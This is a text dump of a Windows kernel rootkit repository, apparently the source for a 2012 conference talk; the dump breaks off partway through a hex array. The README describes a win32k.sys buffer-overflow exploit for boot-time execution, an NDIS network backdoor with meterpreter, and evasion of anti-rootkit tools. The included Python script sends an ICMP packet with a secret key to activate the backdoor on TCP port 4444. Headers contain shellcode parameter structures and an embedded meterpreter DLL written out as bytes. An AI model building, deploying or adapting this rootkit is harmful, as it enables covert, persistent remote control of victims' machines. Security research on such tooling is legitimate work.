Repository: Cr4sh/WindowsRegistryRootkit Branch: master Commit: 41a772552abb Files: 52 Total size: 351.8 KB Directory structure: gitextract_hzqo4tbr/ ├── README.md ├── bin/ │ ├── rootkit_installer.pdb │ └── rootkit_ping.py └── src/ ├── common/ │ ├── catchy32.h │ ├── catchy32.lib │ ├── common.h │ ├── debug.cpp │ ├── debug.h │ ├── ntdll_defs.h │ ├── shellcode2_struct.h │ └── undocnt.h ├── includes/ │ ├── meterpreter_debug.dll.h │ └── rootkit_driver_debug.sys.h ├── meterpreter/ │ ├── dllmain.cpp │ ├── meterpreter.cpp │ ├── meterpreter.def │ ├── meterpreter.vcproj │ ├── post_build.bat │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h ├── meterpreter_bind_tcp.h ├── meterpreter_config.h ├── meterpreter_debug.pdb ├── rootkit.sln ├── rootkit_driver/ │ ├── bogusproto.cpp │ ├── bogusproto.h │ ├── debug.h │ ├── dll_inject.cpp │ ├── dll_inject.h │ ├── dll_inject_shellcode.h │ ├── ndis_hook.cpp │ ├── ndis_hook.h │ ├── network.cpp │ ├── network.h │ ├── post_build.bat │ ├── rootkit_driver.cpp │ ├── rootkit_driver.def │ ├── rootkit_driver.h │ ├── rootkit_driver.vcproj │ ├── runtime.cpp │ ├── runtime.h │ ├── stdafx.h │ └── undocnt.h ├── rootkit_driver_config.h ├── rootkit_driver_debug.pdb ├── rootkit_driver_debug.sys └── rootkit_installer/ ├── rootkit_installer.cpp ├── rootkit_installer.vcproj ├── stdafx.cpp ├── stdafx.h └── targetver.h ================================================ FILE CONTENTS ================================================ ================================================ FILE: README.md ================================================ ****************************************************************************** Kernel rootkit, that lives inside the Windows registry value data. By Oleksiuk Dmytro (aka Cr4sh) http://twitter.com/d_olex http://blog.cr4.sh cr4sh0@gmail.com ****************************************************************************** Rootkit uses the zero day vulnerability in win32k.sys (buffer overflow in function win32k!bInitializeEUDC()) to get the execution at the OS startup. Features: * NDIS-based network backdoor (+ meterpreter/bind_tcp). * In order to avoid unknown executable code detection it moves itself in the memory over discardable sections of some default Windows drivers. * Completely undetectable by public anti-rootkit tools. * Working on Windows 7 (SP0, SP1) x86. ![diagram](https://raw.githubusercontent.com/Cr4sh/blog/master/windows-registry-rootkit/WindowsRegistryRootkit-execution.png) This rootkit was originally presented at the ZeroNights 2012 conference during my talk. See the slides and videos for more information: https://raw.githubusercontent.com/Cr4sh/blog/master/windows-registry-rootkit/Applied-anti-forensics.pdf ================================================ FILE: bin/rootkit_ping.py ================================================ ##################################################################### # # Windows kernrel rootkit PoC using registry values processing BoF. # # Script for meterpreter/bind_tcp backdoor activation on TCP/4444 # port of infected target. # # (c) 2012, Oleksiuk Dmytro (aka Cr4sh) # cr4sh@riseup.net # ##################################################################### import sys, os from optparse import OptionParser BACKDOOR_PORT_NUMBER = 4444 TIMEOUT = 5 try: # import scapy stuff from scapy.all import * except Exception, why: print "[!] Exception while importing module: " + str(why) print "[!] Scapy (http://www.secdev.org/projects/scapy/) is not installed?" sys.exit() if __name__ == '__main__': print "***********************************************************\n" print " Windows kernrel rootkit PoC using registry values processing BoF.\n" print " (c) 2012 Oleksiuk Dmytro (aka Cr4sh)" print " cr4sh@riseup.net\n" print "***********************************************************\n" parser = OptionParser() parser.add_option("-k", "--key", dest = "key", default = None, help = "Rootkit secret key.") parser.add_option("-d", "--dst", dest = "dst", default = None, help = "Destination host IP address.") # parse command line (options, args) = parser.parse_args() if options.key is None or options.dst is None: print "[!] Please specify --dst and --key options" sys.exit() print "[+] Destination host IP address: ", options.dst print "[+] Rootkit secret key: ", options.key print "[+] Backdoor port: ", str(BACKDOOR_PORT_NUMBER) # allocate IP + ICMP packets ip = IP(dst = options.dst) icmp = ICMP(type = 8, code = 0) data = "RKCTL:" + options.key # send it over the network sr1(ip/icmp/data, timeout = TIMEOUT) # scan for opened backdoor port ip = IP(dst = options.dst) TCP_SYN = TCP(sport = RandShort(), dport = int(BACKDOOR_PORT_NUMBER), flags = 'S', seq = 40) # send SYN packet and wait for the first reply TCP_SYNACK = sr1(ip/TCP_SYN, timeout = 1) # SEQ Number for SYN-ACK if not TCP_SYNACK or TCP_SYNACK.getlayer(TCP).flags != 0x12: # response from our target aka hostip - expect RST print "[+] Port %d is closed" % BACKDOOR_PORT_NUMBER else: print "[+] Port %d is opened, use Metasploit for connection to meterpreter/bind_tcp" % BACKDOOR_PORT_NUMBER print "[+] It will be closed immediately after 'exit' command in meterpreter shell" # if end # # EoF # ================================================ FILE: src/common/catchy32.h ================================================ #define CATCHY_ERROR 0xffffffff #ifdef __cplusplus extern "C" { #endif ULONG __cdecl c_Catchy(PVOID); #ifdef __cplusplus } #endif ================================================ FILE: src/common/common.h ================================================ #define TIME_ABSOLUTE(wait) (wait) #define TIME_RELATIVE(wait) (-(wait)) #define TIME_NANOSECONDS(nanos) (((signed __int64)(nanos)) / 100L) #define TIME_MICROSECONDS(micros) (((signed __int64)(micros)) * TIME_NANOSECONDS(1000L)) #define TIME_MILLISECONDS(milli) (((signed __int64)(milli)) * TIME_MICROSECONDS(1000L)) #define TIME_SECONDS(seconds) (((signed __int64)(seconds)) * TIME_MILLISECONDS(1000L)) #define RVATOVA(_base_, _offset_) ((PUCHAR)(_base_) + (ULONG)(_offset_)) #define MY_ALIGN_DOWN(_val_, _align_) ((_val_) &~ ((_align_) - 1)) #define MY_ALIGN_UP(_val_, _align_) (((_val_) & ((_align_) - 1)) ? MY_ALIGN_DOWN((_val_), (_align_)) + (_align_) : (_val_)) #define IFMT32 "0x%.8x" #define IFMT64 "0x%.16I64x" #define GET_NATIVE(_name_) \ \ func_##_name_ f_##_name_ = (func_##_name_)GetProcAddress( \ GetModuleHandle("ntdll.dll"), \ (#_name_) \ ); #if defined(_X86_) #define IFMT IFMT32 #elif defined(_AMD64_) #define IFMT IFMT64 #endif ================================================ FILE: src/common/debug.cpp ================================================ #include "stdafx.h" //-------------------------------------------------------------------------------------- #ifdef DBG //-------------------------------------------------------------------------------------- char *GetNameFromFullPath(char *lpszPath) { char *lpszName = lpszPath; for (int i = 0; i < lstrlenA(lpszPath); i++) { if (lpszPath[i] == '\\' || lpszPath[i] == '/') { lpszName = lpszPath + i + 1; } } return lpszName; } //-------------------------------------------------------------------------------------- typedef int (__cdecl * func_sprintf)(LPSTR, LPCSTR, ...); typedef int (__cdecl * func_vsprintf)(LPSTR, LPCSTR, va_list arglist); typedef int (__cdecl * func__vscprintf)(const char *format, va_list argptr); void DbgMsg(char *lpszFile, int Line, char *lpszMsg, ...) { va_list mylist; va_start(mylist, lpszMsg); func_sprintf f_sprintf = (func_sprintf)GetProcAddress( LoadLibraryA("msvcrt.dll"), "sprintf" ); if (f_sprintf == NULL) { return; } func_vsprintf f_vsprintf = (func_vsprintf)GetProcAddress( LoadLibraryA("msvcrt.dll"), "vsprintf" ); if (f_vsprintf == NULL) { return; } func__vscprintf f__vscprintf = (func__vscprintf)GetProcAddress( LoadLibraryA("msvcrt.dll"), "_vscprintf" ); if (f__vscprintf == NULL) { return; } size_t len = f__vscprintf(lpszMsg, mylist) + 0x100; char *lpszBuff = (char *)LocalAlloc(LMEM_FIXED, len); if (lpszBuff == NULL) { va_end(mylist); return; } char *lpszOutBuff = (char *)LocalAlloc(LMEM_FIXED, len); if (lpszOutBuff == NULL) { LocalFree(lpszBuff); va_end(mylist); return; } f_vsprintf(lpszBuff, lpszMsg, mylist); va_end(mylist); f_sprintf( lpszOutBuff, "[%.5d] .\\%s(%d) : %s", GetCurrentProcessId(), GetNameFromFullPath(lpszFile), Line, lpszBuff ); OutputDebugStringA(lpszOutBuff); HANDLE hStd = GetStdHandle(STD_OUTPUT_HANDLE); if (hStd != INVALID_HANDLE_VALUE) { DWORD dwWritten = 0; WriteFile(hStd, lpszBuff, lstrlenA(lpszBuff), &dwWritten, NULL); } LocalFree(lpszOutBuff); LocalFree(lpszBuff); } //-------------------------------------------------------------------------------------- #endif DBG //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/common/debug.h ================================================ #ifdef DBG void DbgMsg(char *lpszFile, int Line, char *lpszMsg, ...); #else #define DbgMsg #endif ================================================ FILE: src/common/ntdll_defs.h ================================================ typedef LONG NTSTATUS; typedef struct _IO_STATUS_BLOCK { union { NTSTATUS Status; PVOID Pointer; }; ULONG_PTR Information; } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; #undef UNICODE_STRING typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef struct _STRING { USHORT Length; USHORT MaximumLength; PCHAR Buffer; } ANSI_STRING, *PANSI_STRING; typedef struct _CLIENT_ID { HANDLE UniqueProcess; HANDLE UniqueThread; } CLIENT_ID, *PCLIENT_ID; #define OBJ_INHERIT 0x00000002 #define OBJ_PERMANENT 0x00000010 #define OBJ_EXCLUSIVE 0x00000020 #define OBJ_CASE_INSENSITIVE 0x00000040 #define OBJ_OPENIF 0x00000080 #define OBJ_OPENLINK 0x00000100 #define OBJ_VALID_ATTRIBUTES 0x000001F2 typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; #define InitializeObjectAttributes( p, n, a, r, s ) { \ (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ (p)->RootDirectory = r; \ (p)->Attributes = a; \ (p)->ObjectName = n; \ (p)->SecurityDescriptor = s; \ (p)->SecurityQualityOfService = NULL; \ } #define NT_SUCCESS(Status) ((LONG)(Status) >= 0) #define NT_ERROR(Status) ((ULONG)(Status) >> 30 == 3) #define NtCurrentProcess() ((HANDLE)-1) #ifndef STATUS_BUFFER_OVERFLOW #define STATUS_BUFFER_OVERFLOW ((NTSTATUS)0x80000005L) #endif #ifndef STATUS_NO_MORE_FILES #define STATUS_NO_MORE_FILES ((NTSTATUS)0x80000006L) #endif #ifndef STATUS_INFO_LENGTH_MISMATCH #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) #endif #ifndef STATUS_BUFFER_TOO_SMALL #define STATUS_BUFFER_TOO_SMALL ((NTSTATUS)0xC0000023L) #endif #ifndef STATUS_UNSUCCESSFUL #define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) #endif ================================================ FILE: src/common/shellcode2_struct.h ================================================ #define DBGPRINT_MESSAGE "YOU GOT PWND!\n" #define DBGPRINT_MESSAGE_LEN 0x20 typedef struct _SC_PARAMS { PVOID kernel_base; PVOID win32k_base; ULONG rootkit_size; PVOID rootkit_base; ULONG offset_MmIsAddressValid; ULONG offset_PsGetCurrentProcess; ULONG offset_PsGetProcessWin32Process; ULONG offset_ExAllocatePool; ULONG offset_RtlQueryRegistryValues; ULONG offset_UserInitialize; ULONG offset_bInitializeEUDC_patch; #ifdef USE_SHELLCODE_DBGPRINT ULONG offset_DbgPrint; char szDbgPrintMessage[DBGPRINT_MESSAGE_LEN]; #endif } SC_PARAMS, *PSC_PARAMS; /** * Offsets for SC_PARAMS fields. */ #define _kernel_base 0x00 #define _win32k_base 0x04 #define _rootkit_size 0x08 #define _rootkit_base 0x0c #define _MmIsAddressValid 0x10 #define _PsGetCurrentProcess 0x14 #define _PsGetProcessWin32Process 0x18 #define _ExAllocatePool 0x1c #define _RtlQueryRegistryValues 0x20 #define _UserInitialize 0x24 #define _bInitializeEUDC_patch 0x28 #define _DbgPrint 0x2c #define _szDbgPrintMessage 0x30 #define SHELLCODE_2_MAX_BUFF_SIZE 0x300 ================================================ FILE: src/common/undocnt.h ================================================ /************************************************************/ /* */ /* Some structures for native API functions */ /* */ /************************************************************/ typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation, SystemProcessorInformation, // obsolete...delete SystemPerformanceInformation, SystemTimeOfDayInformation, SystemPathInformation, SystemProcessInformation, SystemCallCountInformation, SystemDeviceInformation, SystemProcessorPerformanceInformation, SystemFlagsInformation, SystemCallTimeInformation, SystemModuleInformation, SystemLocksInformation, SystemStackTraceInformation, SystemPagedPoolInformation, SystemNonPagedPoolInformation, SystemHandleInformation, SystemObjectInformation, SystemPageFileInformation, SystemVdmInstemulInformation, SystemVdmBopInformation, SystemFileCacheInformation, SystemPoolTagInformation, SystemInterruptInformation, SystemDpcBehaviorInformation, SystemFullMemoryInformation, SystemLoadGdiDriverInformation, SystemUnloadGdiDriverInformation, SystemTimeAdjustmentInformation, SystemSummaryMemoryInformation, SystemMirrorMemoryInformation, SystemPerformanceTraceInformation, SystemObsolete0, SystemExceptionInformation, SystemCrashDumpStateInformation, SystemKernelDebuggerInformation, SystemContextSwitchInformation, SystemRegistryQuotaInformation, SystemExtendServiceTableInformation, SystemPrioritySeperation, SystemVerifierAddDriverInformation, SystemVerifierRemoveDriverInformation, SystemProcessorIdleInformation, SystemLegacyDriverInformation, SystemCurrentTimeZoneInformation, SystemLookasideInformation, SystemTimeSlipNotification, SystemSessionCreate, SystemSessionDetach, SystemSessionInformation, SystemRangeStartInformation, SystemVerifierInformation, SystemVerifierThunkExtend, SystemSessionProcessInformation, SystemLoadGdiDriverInSystemSpace, SystemNumaProcessorMap, SystemPrefetcherInformation, SystemExtendedProcessInformation, SystemRecommendedSharedDataAlignment, SystemComPlusPackage, SystemNumaAvailableMemory, SystemProcessorPowerInformation, SystemEmulationBasicInformation, SystemEmulationProcessorInformation, SystemExtendedHandleInformation, SystemLostDelayedWriteInformation, SystemBigPoolInformation, SystemSessionPoolTagInformation, SystemSessionMappedViewInformation, SystemHotpatchInformation, SystemObjectSecurityMode, SystemWatchdogTimerHandler, SystemWatchdogTimerInformation, SystemLogicalProcessorInformation, SystemWow64SharedInformation, SystemRegisterFirmwareTableInformationHandler, SystemFirmwareTableInformation, SystemModuleInformationEx, SystemVerifierTriageInformation, SystemSuperfetchInformation, SystemMemoryListInformation, SystemFileCacheInformationEx, MaxSystemInfoClass // MaxSystemInfoClass should always be the last enum } SYSTEM_INFORMATION_CLASS; typedef struct _RTL_PROCESS_MODULE_INFORMATION { HANDLE Section; // Not filled in PVOID MappedBase; PVOID ImageBase; ULONG ImageSize; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT OffsetToFileName; UCHAR FullPathName[ 256 ]; } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; typedef struct _RTL_PROCESS_MODULES { ULONG NumberOfModules; RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ]; } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; typedef enum _SHUTDOWN_ACTION { ShutdownNoReboot, ShutdownReboot, ShutdownPowerOff } SHUTDOWN_ACTION, *PSHUTDOWN_ACTION; typedef struct _DIRECTORY_BASIC_INFORMATION { UNICODE_STRING ObjectName; UNICODE_STRING ObjectTypeName; } DIRECTORY_BASIC_INFORMATION, *PDIRECTORY_BASIC_INFORMATION; typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex; UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG GrantedAccess; } SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO; typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG NumberOfHandles; SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[ 1 ]; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; /************************************************************/ /* */ /* Prototypes for native and kernel API functions */ /* */ /************************************************************/ typedef enum _KPROFILE_SOURCE { ProfileTime, ProfileAlignmentFixup, ProfileTotalIssues, ProfilePipelineDry, ProfileLoadInstructions, ProfilePipelineFrozen, ProfileBranchInstructions, ProfileTotalNonissues, ProfileDcacheMisses, ProfileIcacheMisses, ProfileCacheMisses, ProfileBranchMispredictions, ProfileStoreInstructions, ProfileFpInstructions, ProfileIntegerInstructions, Profile2Issue, Profile3Issue, Profile4Issue, ProfileSpecialInstructions, ProfileTotalCycles, ProfileIcacheIssues, ProfileDcacheAccesses, ProfileMemoryBarrierCycles, ProfileLoadLinkedIssues, ProfileMaximum } KPROFILE_SOURCE, *PKPROFILE_SOURCE; typedef NTSTATUS (WINAPI * func_NtQueryIntervalProfile)( KPROFILE_SOURCE ProfileSource, PULONG Interval ); typedef NTSTATUS (WINAPI * func_NtQuerySystemInformation)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); typedef CCHAR KPROCESSOR_MODE; typedef enum _MODE { KernelMode, UserMode, MaximumMode } MODE; typedef NTSTATUS (WINAPI * func_NtAllocateVirtualMemory)( HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect ); typedef NTSTATUS (WINAPI * func_KeDelayExecutionThread)( KPROCESSOR_MODE WaitMode, BOOLEAN Alertable, PLARGE_INTEGER Interval ); typedef VOID (WINAPI * func_KeUnstackDetachProcess)( PVOID ApcState ); typedef enum _POOL_TYPE { NonPagedPool, PagedPool } POOL_TYPE; typedef PVOID (WINAPI * func_ExAllocatePool)( POOL_TYPE PoolType, SIZE_T NumberOfBytes ); typedef HANDLE (WINAPI * func_PsGetCurrentProcessId)(VOID); typedef HANDLE (WINAPI * func_PsGetCurrentThreadId)(VOID); typedef PVOID (WINAPI * func_PsGetCurrentThread)(VOID); typedef NTSTATUS (WINAPI * func_ZwOpenThread)( PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId ); typedef VOID (WINAPI * func_RtlInitUnicodeString)( PUNICODE_STRING DestinationString, PCWSTR SourceString ); typedef VOID (WINAPI * func_RtlInitAnsiString)( PANSI_STRING DestinationString, PCSTR SourceString ); typedef NTSTATUS (WINAPI * func_RtlAnsiStringToUnicodeString)( PUNICODE_STRING DestinationString, PANSI_STRING SourceString, BOOLEAN AllocateDestinationString ); typedef BOOLEAN (WINAPI * func_RtlEqualUnicodeString)( UNICODE_STRING *String1, UNICODE_STRING *String2, BOOLEAN CaseInSensitive ); typedef VOID (WINAPI * func_RtlFreeUnicodeString)( PUNICODE_STRING UnicodeString ); typedef NTSTATUS (WINAPI * func_NtOpenFile)( PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions ); typedef VOID (__fastcall * func_IofCompleteRequest)( struct _IRP *Irp, CCHAR PriorityBoost ); typedef NTSTATUS (WINAPI * func_PsLookupProcessByProcessId)( HANDLE ProcessId, PVOID *Process ); ================================================ FILE: src/includes/meterpreter_debug.dll.h ================================================ // 5632 bytes readed form ..\meterpreter_debug.dll... unsigned char dll[] = { 0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00, 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x00,0x00,0x00, 0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68, 0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f, 0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20, 0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x11,0xcb,0xaf,0x83,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0,0x55,0xaa,0xc1,0xd0, 0x72,0x6c,0xba,0xd0,0x52,0xaa,0xc1,0xd0,0x55,0xaa,0xc0,0xd0,0x4c,0xaa,0xc1,0xd0, 0x5c,0xd2,0x45,0xd0,0x51,0xaa,0xc1,0xd0,0x5c,0xd2,0x53,0xd0,0x54,0xaa,0xc1,0xd0, 0x5c,0xd2,0x50,0xd0,0x54,0xaa,0xc1,0xd0,0x52,0x69,0x63,0x68,0x55,0xaa,0xc1,0xd0, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x50,0x45,0x00,0x00,0x4c,0x01,0x04,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xe0,0x00,0x02,0x21,0x0b,0x01,0x09,0x00,0x00,0x06,0x00,0x00, 0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x12,0x00,0x00,0x00,0x10,0x00,0x00, 0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00, 0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x50,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x40,0x05, 0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00, 0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x60,0x26,0x00,0x00,0x4e,0x00,0x00,0x00, 0xd8,0x23,0x00,0x00,0x50,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x40,0x00,0x00,0xc8,0x00,0x00,0x00,0x70,0x20,0x00,0x00,0x1c,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x70,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00, 0x76,0x05,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x04,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60, 0x2e,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x11,0x07,0x00,0x00,0x00,0x20,0x00,0x00, 0x00,0x08,0x00,0x00,0x00,0x0a,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2e,0x64,0x61,0x74,0x61,0x00,0x00,0x00, 0x2b,0x01,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x12,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xc0, 0x2e,0x72,0x65,0x6c,0x6f,0x63,0x00,0x00,0xde,0x00,0x00,0x00,0x00,0x40,0x00,0x00, 0x00,0x02,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xff,0x54,0x24,0x04,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x81,0xec,0x1c,0x01,0x00,0x00,0x56,0x57,0xc7,0x85,0xe8,0xfe,0xff, 0xff,0x00,0x00,0x00,0x00,0xff,0x15,0x24,0x20,0x00,0x10,0x50,0xff,0x15,0x20,0x20, 0x00,0x10,0x50,0x68,0x8c,0x20,0x00,0x10,0x6a,0x16,0x68,0xb0,0x20,0x00,0x10,0xe8, 0x7c,0x03,0x00,0x00,0x83,0xc4,0x14,0x68,0x5c,0x11,0x00,0x00,0x68,0xc0,0x20,0x00, 0x10,0x6a,0x1a,0x68,0xf8,0x20,0x00,0x10,0xe8,0x63,0x03,0x00,0x00,0x83,0xc4,0x10, 0x68,0x5c,0x11,0x00,0x00,0x68,0x08,0x21,0x00,0x10,0x8d,0x85,0xf0,0xfe,0xff,0xff, 0x50,0xff,0x15,0x64,0x20,0x00,0x10,0x83,0xc4,0x0c,0x6a,0x00,0x8d,0x8d,0xf0,0xfe, 0xff,0xff,0x51,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b, 0x95,0xec,0xfe,0xff,0xff,0x52,0x68,0x40,0x21,0x00,0x10,0x6a,0x21,0x68,0x64,0x21, 0x00,0x10,0xe8,0x19,0x03,0x00,0x00,0x83,0xc4,0x10,0x6a,0x40,0x68,0x00,0x30,0x00, 0x00,0x68,0x2b,0x01,0x00,0x00,0x6a,0x00,0xff,0x15,0x18,0x20,0x00,0x10,0x89,0x45, 0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xa1,0x00,0x00,0x00,0x8b,0x45,0xfc,0x50,0x68, 0x2b,0x01,0x00,0x00,0x68,0x74,0x21,0x00,0x10,0x6a,0x28,0x68,0xac,0x21,0x00,0x10, 0xe8,0xdb,0x02,0x00,0x00,0x83,0xc4,0x14,0xb9,0x4a,0x00,0x00,0x00,0xbe,0x00,0x30, 0x00,0x10,0x8b,0x7d,0xfc,0xf3,0xa5,0x66,0xa5,0xa4,0x6a,0x00,0x6a,0x00,0x8b,0x4d, 